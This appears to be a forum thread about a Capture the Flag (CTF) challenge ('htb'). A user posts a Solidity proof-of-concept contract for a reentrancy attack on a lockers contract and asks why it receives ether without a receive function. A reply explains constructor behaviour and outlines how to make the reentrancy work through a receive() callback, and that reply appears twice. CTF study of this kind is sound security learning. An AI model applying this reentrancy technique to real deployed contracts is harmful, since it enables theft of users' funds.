Hi guys, i wanted to write POC for a reentrancy attack but somehow its not working, and its strange that this contract is receiving ether even without any receive or fallback function
how can that be possible ?
pragma solidity ^0.8.13;
interface ILockers {
function sellItem(string calldata name, string calldata password) external;
function getLocker(string calldata username, string calldata password) external;
function putItem(string calldata name, string calldata owner, uint8 rarity) external;
}
contract ReentrancyAttack {
ILockers public lockersContract;
address public target;
uint public bal;
event debug(string pos, uint num);
constructor(address _lockersContractAddress ) {
lockersContract = ILockers(_lockersContractAddress);
target = _lockersContractAddress;
emit debug("Constructor", 11);
emit debug("attack", 11);
lockersContract.getLocker("xyz1", "abc");
emit debug("attack", 12);
lockersContract.putItem("htb", "xyz1", 2);
emit debug("attack", 13);
emit debug("attack", 14);
lockersContract.sellItem("htb", "abc");
emit debug("attack", 15);
bal = target.balance;
}
// Withdraw Ether from the attack contract
function withdraw() public {
payable(msg.sender).transfer(address(this).balance);
}
}
Jan 17, 2024, 3:37 AM
i used REMIX
Jan 17, 2024, 3:37 AM
Thats because you call the functions that sends you ether in the constructor. Contratcts in construction returns 0 for account.code.length
In order to do reentrancy you should specify receive() function in the attack contract and put the logic you want to execute when the contract receive ether there (for example trigger the function that sends you ether again until some criteria is met).
In order to do reentrancy you should specify receive() function in the attack contract and put the logic you want to execute when the contract receive ether there (for example trigger the function that sends you ether again until some criteria is met).
Jan 17, 2024, 7:55 AM